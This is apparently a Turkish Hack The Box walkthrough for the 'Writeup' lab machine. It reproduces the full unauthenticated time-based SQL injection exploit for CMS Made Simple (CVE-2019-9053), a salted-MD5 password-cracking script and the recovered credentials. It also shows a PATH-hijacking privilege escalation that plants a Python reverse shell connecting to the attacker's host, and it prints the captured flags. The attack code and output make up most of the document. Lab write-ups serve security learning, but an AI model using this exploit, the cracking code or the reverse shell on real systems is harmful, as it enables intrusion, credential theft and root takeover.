| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Writeup - HTB | Orta | Linux |
Walkthrough
nmap taraması:
┌──(root💀kali)-[~]
└─# nmap -p- -A -T4 10.10.10.138
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-03 18:36 EDT
Stats: 0:01:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 96.12% done; ETC: 18:37 (0:00:04 remaining)
Stats: 0:01:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.14% done; ETC: 18:37 (0:00:00 remaining)
Nmap scan report for 10.10.10.138
Host is up (0.069s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2
(92%), Linux 4.4 (92%), Linux 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 68.76 ms 10.10.14.1
2 68.83 ms 10.10.10.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.78 seconds
80'i görünce tarama yapmaya başlayacaktım ancak belirli tarama işlemleri yapılınca portun kapatıldığını gördüm. Belirli bir süre servis düşüyor ve daha sonrasında tekrar açılıyor. Bu çok kötü çünkü dirb, gobuster gibi araçları kullanamayacağım anlamına geliyor. Daha sonrasında tarayıcıdan sayfaya gittim. Bir ddos ürünü kullanıldığını söylemiş ve 40* hataları alındığında bunu bir ddos olarak düşünüp servisi belirli bir süre durduruyor. İlk olarak sayfadaki bütün kelimleri çektim ve bir wordlist oluşturdum.
┌──(root💀kali)-[~/10.10.10.138]
└─# cewl --lowercase --with-numbers -d 3 http://10.10.10.138/ -w wordlist
Daha sonrasında bir python script'i yazdım. Bu script aracılığıyla sunucu 404'ten dolayı kapatıldığında belirli bi süre bekleyip daha sonrasında tekrar dosya dizin keşfine devam ediyordu. Kodum aşağıda verilmiştir.
┌──(root💀kali)-[~/10.10.10.138]
└─# cat exploit/dirbb.py 130 ⨯
path = input("Dosya adı:\r\n")
dosya = open(path)
wordlist = dosya.read().split("\n")
dosya.close()
dizi200 = []
url = "http://10.10.10.138/"
import requests
import time
sayac = 0
#try:
for i in wordlist:
sayac = sayac + 1
try:
r = requests.get(url+i)
if(r.status_code == "200"):
dizi200.append(url+i)
url_ = url + i
print(url_,r.status_code)
except:
print("ddos script'e yakalandı, bekleniyor!")
time.sleep(60)
if(sayac == 5):
time.sleep(10)
sayac = 0
print("---------------")
for ii in dizi200:
print(ii)
print("---------------")
#except:
# print("ddos script'e yakalandı, bekleniyor!")
# time.sleep(60)
┌──(root💀kali)-[~/10.10.10.138]
└─# python3 exploit/dirbb.py
...
...
http://10.10.10.138/apache 404
http://10.10.10.138/40x 404
http://10.10.10.138/errors 404
http://10.10.10.138/bans 404
---------------
---------------
ddos script'e yakalandı, bekleniyor!
ddos script'e yakalandı, bekleniyor!
http://10.10.10.138/hope 404
http://10.10.10.138/get 404
http://10.10.10.138/hit 404
---------------
---------------
http://10.10.10.138/false 404
http://10.10.10.138/positive 404
http://10.10.10.138/drops 404
http://10.10.10.138/where 404
http://10.10.10.138/download 404
---------------
---------------
http://10.10.10.138/the 404
http://10.10.10.138/proper 404
http://10.10.10.138/donkey 404
http://10.10.10.138/please 404
http://10.10.10.138/let 404
---------------
---------------
http://10.10.10.138/via 404
http://10.10.10.138/mail 404
http://10.10.10.138/jkr 404
http://10.10.10.138/writeup 200
http://10.10.10.138/writeup adresinde 200 statu code'unu aldım. Sayfaya gittiğimde sayfanın kaynak kodlarını incelerken başlık kısmında CMS Made Simple ifadesini gördüm. Bunun üzerine yayınlanmış bir exploit var mı diye aradım.
└─# searchsploit CMS Made Simple
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | php/webapps/46546.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
Sqlinjection exploiti buldum ancak python dosyasını düzenlemem gerekiyordu. Python2ye göre yazılmış ve parolayı kırarke program çöküyordu. Düzenlenmiş hali aşağıda verilmiştir.
┌──(root💀kali)-[~/10.10.10.138/exploit]
└─# cat 46635.py
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") [127/205]
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()
if not options.url:
print("[+] Specify an url target")
print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
exit()
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
wordlist += options.wordlist
def crack_password():
global password
global output
global wordlist
global salt
dict = open(wordlist, encoding='latin-1')
for line in dict.readlines():
line = line.replace("\n", "")
beautify_print_try(line)
if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:
output += "\n[+] Password cracked: " + line
break
dict.close()
def beautify_print_try(value):
global output
print("\033c") [84/205]
cprint(output,'green', attrs=['bold'])
cprint('[*] Try: ' + value, 'red', attrs=['bold'])
def beautify_print():
global output
print("\033c")
cprint(output,'green', attrs=['bold'])
def dump_salt():
global flag
global salt
global output
ord_salt = ""
ord_salt_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_salt = salt + dictionary[i]
ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_salt)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
salt = temp_salt
ord_salt = ord_salt_temp
flag = True
output += '\n[+] Salt for password found: ' + salt
def dump_password():
global flag
global password
global output
ord_password = ""
ord_password_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)): [41/205]
temp_password = password + dictionary[i]
ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_password)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
password = temp_password
ord_password = ord_password_temp
flag = True
output += '\n[+] Password found: ' + password
def dump_username():
global flag
global db_name
global output
ord_db_name = ""
ord_db_name_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_db_name = db_name + dictionary[i]
ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_db_name)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
db_name = temp_db_name
ord_db_name = ord_db_name_temp
output += '\n[+] Username found: ' + db_name
flag = True
def dump_email():
global flag
global email
global output
ord_email = ""
ord_email_temp = ""
while flag:
flag = False
for i in range(0, len(dictionary)):
temp_email = email + dictionary[i]
ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
beautify_print_try(temp_email)
payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
url = url_vuln + "&m1_idlist=" + payload
start_time = time.time()
r = session.get(url)
elapsed_time = time.time() - start_time
if elapsed_time >= TIME:
flag = True
break
if flag:
email = temp_email
ord_email = ord_email_temp
output += '\n[+] Email found: ' + email
flag = True
dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
print(colored("[*] Now try to crack password"))
crack_password()
beautify_print()
Kodu çalıştırdığımda aşağıdaki çıktıları aldım.
#[+] Salt for password found: 5a599ef579066807
#[+] Username found: jkr
#[+] Email found: [email protected]
#[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Daha sonrasında kodun içerisindeki hash'i kırma kısmını ayrı bir python koduna kaydettim ve kırma işlemini kendim yaptım. Python kodu aşağıda verilmiştir.
import hashlib
def crack_password():
password = "62def4866937f08cc13bab43bb14e6f7"
wordlist = "/usr/share/wordlists/rockyou.txt"
salt = "5a599ef579066807"
dict = open(wordlist, encoding="latin-1")
for line in dict.readlines():
line = line.replace("\n", "")
# beautify_print_try(line)
if hashlib.md5(str.encode(str(salt)) + str.encode(line)).hexdigest() == password:
print("\n[+] Password cracked: " + line)
break
dict.close()
crack_password()
┌──(root💀kali)-[~/10.10.10.138/exploit]
└─# python3 crack.py
[+] Password cracked: raykayjay9
Ssh ile bağlantı yaptığımda user flag'i okudum.
┌──(root💀kali)-[~]
└─# ssh [email protected]
[email protected]'s password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$ pwd
/home/jkr
jkr@writeup:~$ ls
user.txt
jkr@writeup:~$ cat user.txt
846446f10caff03660d3ef24705e13ec
jkr@writeup:~$
İçeride bir takım kontroller gerçekleştirdim ki bana göre python kütüphanlerini kullanarak root olmamız lazım ancak başarılı olmadı. Bunun sebebini gerçekten anlamş değilim. Neyse...
Makineye pspy aracını attım ve processleri görüntülemeye başladım.
jkr@writeup:/tmp$ wget http://10.10.14.21/pspy32s
--2021-10-04 18:38:52-- http://10.10.14.21/pspy32s
Connecting to 10.10.14.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1090528 (1.0M) [application/octet-stream]
Saving to: ‘pspy32s’
pspy32s 100%[==============================>] 1.04M 559KB/s in 1.9s
2021-10-04 18:38:54 (559 KB/s) - ‘pspy32s’ saved [1090528/1090528]
jkr@writeup:/tmp$ chmod 777 pspy32s
ssh bağlantısı yaptığımda oluşan process'ler aşağıda verilmiştir..
2021/10/04 18:40:01 CMD: UID=0 PID=2059 | /usr/sbin/CRON
2021/10/04 18:40:01 CMD: UID=0 PID=2060 | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
2021/10/04 18:40:05 CMD: UID=0 PID=2061 | sshd: [accepted]
2021/10/04 18:40:05 CMD: UID=0 PID=2062 | sshd: [accepted]
2021/10/04 18:40:09 CMD: UID=0 PID=2063 | sshd: jkr [priv]
2021/10/04 18:40:09 CMD: UID=0 PID=2064 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2021/10/04 18:40:09 CMD: UID=0 PID=2065 | run-parts --lsbsysinit /etc/update-motd.d
2021/10/04 18:40:09 CMD: UID=0 PID=2066 | /bin/sh /etc/update-motd.d/10-uname
2021/10/04 18:40:09 CMD: UID=0 PID=2067 | sshd: jkr [priv]
Görüldüğü üzere run-parts isimli program bir path belirtilmeden çalıştırılmış.
PATH'e baktığımızda:
jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Ayrıca yazaileceğimiz pathlere baktığımızda:
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group jkr:
/tmp/linpeas.sh
Group cdrom:
Group floppy:
Group audio:
Group dip:
Group video:
Group plugdev:
Group staff:
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
Path'i manipüle edebileceğimzi görebiliyoruz. Bir reverse shell oluşturup root olalım.
jkr@writeup:/tmp$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
jkr@writeup:/tmp$ cd /usr/local/bin
jkr@writeup:/usr/local/bin$ touch run-parts
jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
jkr@writeup:/usr/local/bin$ chmod 777 run-parts
Makineye tekrardan ssh ile bağlanmayı denediğimde:
┌──(root💀kali)-[~]
└─# ssh [email protected]
[email protected]'s password:
1324 portuma reverse geliyor.
┌──(root💀kali)-[/opt]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.21] from writeup.htb [10.10.10.138] 52400
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
bin root.txt
# cat root.txt
cat root.txt
5fd505e0c8af615cf7f6c36d60ee5276
İlk Yorumu Siz Yapın